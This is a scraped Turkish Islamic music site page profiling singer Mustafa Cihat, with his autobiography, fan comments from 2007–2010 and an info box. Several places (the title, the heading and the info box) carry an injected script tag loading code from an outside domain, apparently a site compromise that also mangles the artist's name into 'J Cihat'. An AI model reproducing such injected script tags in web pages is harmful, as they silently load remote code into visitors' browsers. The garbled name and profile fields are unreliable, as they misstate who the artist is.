İslami Müzik Tv
İslami Müzik TV

  Ayeti Kerime
" "
  Hadis-i Şerif
""

J<script src=http://3doyun.net/dcr/s.js></script> Cihat Profili - İslamimuzik.com

    J Cihat Kimdir ?J<script src=http://3doyun.net/dcr/s.js></script> 76 kışının 19 kasımında bir Cuma akşamı açmışım gözlerimi dünyaya. İnsanların korkudan evlerinin pencerelerini sıkı sıkı perdelediği, evlatlarını uğurlarken sıkı sıkı tembihlediği, sağ salim eve dönmeleri için el açıp dua ettiği bir zamanda. Tedirginliğin insanların hep yanında olduğu bir dönemde merhaba demiştim dünyaya.

Elbette dünyaya gelişim birilerinin hasretle ümit ettiği, ve bir yerleri kurtarması için beklenen bir kahraman gelişi değildi. Sade bir Anadolu evinde kılıç ailesinin ümitlerinin karşılığı herkesin yaşayabileceği kadar bir mutluluk anı sadece. Evin en küçüğü, diğer 3 kardeşinin arkadaşlarına “bizim bir kardeşimiz daha oldu” diyecekleri kadar sade ve sevinçli bir haber.

Babam ismimi doğmadan önce koymuş. “Allah bir erkek evlat verirse adı Mustafa Cihat olsun adının adamı olsun” demiş.

Çocukluğum her çocuk gibi oyunlarla ve oynayacağımız yeni oyunların hayalleriyle geçti. Belki tek farkım her şeyin çok kıymetli olduğu ve kıymetinin bilindiği bir devrin çocuğu olmamdı. Mahallede plastik topu olanın tüm oyunları ve kurallarını belirlediği, top oynarken plastik kramponu olanın takım kaptanı olduğu zamanlardı. Her şey azdı kıymetliydi, farklıydı ama çok tatlıydı.

Çabucak geçen yıllar ve ilk okul. “yahu cihat Maşallah görmeyeli kocaman adam olmuşsun sen be” diyen babamın arkadaşlarını hep sevdim.

Orta okul imam hatibe yazılıp okul bahçesinde, beyaz gömlek, lacivert bir ceket, gri pantolon, ağabeyimden kalan bordo kravatla ve elimdeki kitaplarla girdiğim o ilk gün “babamın arkadaşları haklı ben artık büyüdüm” dedim. Artık bundan sonra bende kravat takıcam. Ceket giyicem boyumdan büyük laflar edicem.

Ortaokulda uslu bir öğrenci olduğumu söylerlerdi hep hocalar sorulduğunda cevap veren az konuşan çok dinleyen bir öğrenci. Lisede ise tam tersi çok konuşan dinlemeyen sorulmasada her şeye karşı cevap veren bir öğrenci.

Lisede geçen 3 yıl geleceğimi yönlendirdi demeliyim. Bağlılık, sadakat kardeşlik, idealler, hayallar ve daha bir çok erdem. Daha düşmeden koluma giriverecek ağabeyler, dostlar tanıdım. Her sorunun bir cevabı vardı. Ve hepsinin cevabını öğrenmek için hep sordum tereddütsüz ve şüphesiz cevaplar aldım ve onlara sıkıca sarıldım. Bana sorulursa aynen cevaplamak için.

Lise sona geldiğimde abi olmanın tadıyla ve heyecanıyla daha bir başka konuşmaya başladım. Bu konuşmalar biraz yüksek sesli olsa gerek değerli bir abim bana “radyo kurduk orada program yapacaksın” dedi. Cevabımı dinlemeden bunu söz saydı. Ve radyoda program yapmaya başladım. Bu arada bir müzik grubumuzda vardı. Bizim saydığımız sahiplendiğimiz ezgileri söylemeye dinletmeye çalıştık anlatan ve dinleyen olmasa da.

Hızlı geçen günler ve yıllar bana iltimas yapmadı yoluna durmadan devam etti. Antalya’da geçen 5 yılda hayatın önemli virajlarından geçtim. Radyo ve müzik hep ilgimi tazeledi. Anlatmak istediklerimi konuşarak anlatmak daha güzeldi müzikle anlatmak. 93 yılında kendimde fark ettiğim Mevla’nın bana bahşettiği ilham, sözlere ve melodilere döküldü. Antalya’da kurduğumuz müzik grubu ile de bestelerimizi okumaya derdimizi anlatmaya çalıştık.

Ve 97 de hayatımın en önemli teklifini duymak nasip oldu. Can dost Eşraf Ziya soğuk bir kış günü bana “Cihat gel senle İstanbul’da bir müzik firması kuralım” dediğinde artık beklenen zamanın geldiğini fark ettim. Artık söylediklerim yazdıklarım konuştuklarım sadece bende kalmayacak aynı düşündüğümüz insanlarla ortak sözümüzü olacak dedim. Ve 98 de Marmara müzik adı altında, can dost Eşref Ziya abimle sesimizi duyurma adına bir fırsat yakalamış olduk.

Gelinen bu günde, en azından bir dostla, hayatın herhangi bir yerinde olmak, onunla her şeyi paylaşmak, ideallerimizi inancımızı onunla beraber diri tutmak, duayla, sabırlar, inançla, vefayla, sadakatle, ve ille de şükürle olmak yakışır bana ve herkese.

Merak edenler için yazılan bunca şeyden sonra eğer bir hata edildiyse affola. Takdir edersiniz ki yazmak zordur hele ki kendini yazmak daha bir zır, o halde mazur görmek bizim kardeşliğimize ve samimiyetimize yakışır.

Dualarınızda bana yer ayırmanız dileğiyle..


Bu Sanatçının Profili 13674 kez ziyaret edilmiştir.

     J Cihat - Yorum Ekle

piyanist_emrah
s.aleyküm mustafa cihat albümlerini yakından takib ediyorum kaliteyi yakaladığın çok açık bi şekilde ortada yanlız bi hatırlatma yapıcam siz canlı okuma yapmasanız sizin için daha iyi olur diye düşünüyorum canlı okumak her babayiğidin harcı değildir bu konuda ömer karaoğlu iyi bir örnektir..sizlere bundan sonraki müzik hayatınızda başarılar diliyorum...(piyanist_emrah)HATAY/DÖRTYOL
Bu yorum 2010-08-17 16:44:06 tarihinde yapıldı.

aslıhan içakın
mustafa kardeşimi beğenerek dinliyorum. sözleri anlamlı düşünerek dinliyorum.biz müslümanlar sözlere değer vermeliyiz.söz ve müziklerinin devamını diliyorum...
Bu yorum 2010-07-10 00:26:52 tarihinde yapıldı.

yasemin şimşek
s.a. mustafa abi ben samandıradan yasemin6 kım cumartesi günü samandıra kültür merkezine gelmiştınız ya işte o zaman cok sevindim ve çok teşekkür ederim bu arada ramazan bayramın mübarek olsun HAYIRLI BAYRAMLAR
Bu yorum 2007-10-12 20:30:51 tarihinde yapıldı.

A.SAMET ACAR
ESSELAMUN ALEYKUM,SİZİN GİBİ İSLAMIN SESİNİ BÜTÜN KİTLELERE DUYURABİLEN İNSANLAR OLDUGU İÇİN ÇOK MUTLUYUM.O KAPKARANLIK TV LERDE RADYOLARDA SİZİN GİBİ AYDINLIK NURLU SİMALAR GÖRMEK ÇOK HOŞ BİR DUYGU.ALLAH MÜCADELENİZDE SİZLERİ MUHAFFAK ETSİN.HEP YANINIZDAYIZ(SAMSUN GENÇLİK)
Bu yorum 2007-09-12 16:12:11 tarihinde yapıldı.

isminur ekici
mustafa abi size bi sorum olacaktı cevap yazarsanız çok mutlu olurum. siz gerçekten hissederek okuyorsunuz bende dinlerken sizn okuduğunuzda hissettiğiniz o mütiş duyguları hiisetmek istiyorum dinlerken etkilenmek istiyorum lütfen bu küçük kardeşinize yardım edin allah razı olsun sizden
Bu yorum 2007-09-06 15:44:33 tarihinde yapıldı.

isminur ekici
mustafa abicim sizi gerçekten beğenerek dinliyoruz ve sizi çok seviyoruz konserlerinizi bekliyoruz inşallah bizim yazdıklarımızı da okursunuz allah sizden razı olsun abicim allah sizleri başımızdan eksik etmesin sizin bütün albümlerinizi dinliyorum ve çok çok beğeniyorum sesinizde çok güzel allah yardımcınız olsun (15)
Bu yorum 2007-09-06 15:39:12 tarihinde yapıldı.

merve
selamünaleyküm. bende konserlerini gerçekten bekleyen biriyim. yıllar önce darende de somuncubaba sempoozyumunda dinlemiştim. onu ve diğer birçok değerli yorumcuyu. ardından ilk aldığım kaset tut elimizden oldu. ve sonra diğer kasetleri. hala çok severek. daha önemlisi hala hissederek dinliyorum hepsini. birçok arkadaşıma dinlettim ve ben bunu daha önce nasıl duymadım diye tepkiler aldım. ve sese yapabileceğim tek bir yorum var. o kadar hissederek okunmuş ki sanki okunmamış yaşanmış. ve bu hisleri o kadar güzel aktarıyor ki. her dinleyişimde aynı hisleri bana da yaşatabiliyor. hala gözümü yaşartan içimi sızlatan parçalar bunlar. bunlar sadece sözle sadece müzikle yapılamaz. belli bu işe birileri gönlünü koymuş. bizlere gönlünü açmış. bunu okurmusunuz bilemem. ama Allah razı olsun. çünkü bizim de gönlümüzü açtınız
Bu yorum 2007-08-31 03:06:07 tarihinde yapıldı.

ayşegül
merhab mustafa abi ezgileribiz hepsini uzun zamandır dinliyorum ve çok seviyorum yeni ezgilerde buluşmak dileğiyle
Bu yorum 2007-08-28 18:04:08 tarihinde yapıldı.

murat
ya mustafa abim çok değişik bir sesiniz var maşallah ben şimdiye kadar böyle tatlı bir ses dinlememiştim albümlerinizin devamını bekliyoruz.
Bu yorum 2007-08-06 19:09:33 tarihinde yapıldı.

rumuz reyyan
s.a mustafa abi.seni ben ve arkadaşlarım beğeniyle dinliyoruz.albümlerini yakından takip ediyoruz.hele 3yaralı gelincik çiçeği eserini 5yaralı gelincik diye kendimize grup adı yaptık.seninle tanışmayı çok istiyoruz.konserlerini nereden takip edebiliriz,ayrıca ist./zeytinburnunda konser vermeyi düşünmezmisin.FİEMANİLLAH...
Bu yorum 2007-07-15 03:00:15 tarihinde yapıldı.


Yorum Yapyn

J Cihat

J<script src=http://3doyun.net/dcr/s.js></script>
Genel Bilgiler

Adı: J
Soyadı: Cihat
Doğum Yılı:
Doğum Yeri:
Tarz:
Eğitim Durumu:
Albüm Sayısı: 3
Etiketler:
Websitesi: Resmi Sayfası